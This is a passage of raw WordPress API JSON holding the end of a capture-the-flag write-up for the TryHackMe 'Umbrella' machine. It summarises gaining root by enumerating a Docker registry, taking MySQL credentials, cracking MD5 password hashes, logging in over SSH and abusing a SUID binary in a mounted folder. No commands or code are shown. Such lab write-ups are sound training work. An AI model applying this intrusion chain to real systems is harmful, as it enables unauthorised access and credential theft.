src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=1024%2C176&#038;ssl=1\" alt=\"\" class=\"wp-image-146\" style=\"width:944px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=1024%2C176&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=300%2C52&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=768%2C132&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?w=1105&amp;ssl=1 
1105w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can execute the binary now and become root!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"953\" height=\"103\" data-attachment-id=\"147\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/root-final\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?fit=953%2C103&amp;ssl=1\" data-orig-size=\"953,103\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"root-final\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?fit=953%2C103&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=953%2C103&#038;ssl=1\" alt=\"\" class=\"wp-image-147\" style=\"width:937px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?w=953&amp;ssl=1 953w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=300%2C32&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=768%2C83&amp;ssl=1 768w\" sizes=\"auto, (max-width: 953px) 100vw, 953px\" \/><\/figure>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" 
class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h2>\n\n\n\n<p>The initial foothold requires a lot of enumeration of the Docker registry and careful parsing of the data. The MD5 hashes were easy to crack, and getting a foothold from there was easy. For privilege escalation, the key was to find the mounted folder, since common privilege escalation scripts failed to find anything useful. Overall, it was something new to learn and share. If you liked this write-up, please feel free to leave a comment or let me know if you know another way to approach this box.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and connect to SSH. 
To get [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,13,12],"tags":[],"class_list":["post-103","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=103"}],"version-history":[{"count":24,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103\/revisions"}],"predecessor-version":[{"id":163,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103\/revisions\/163"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}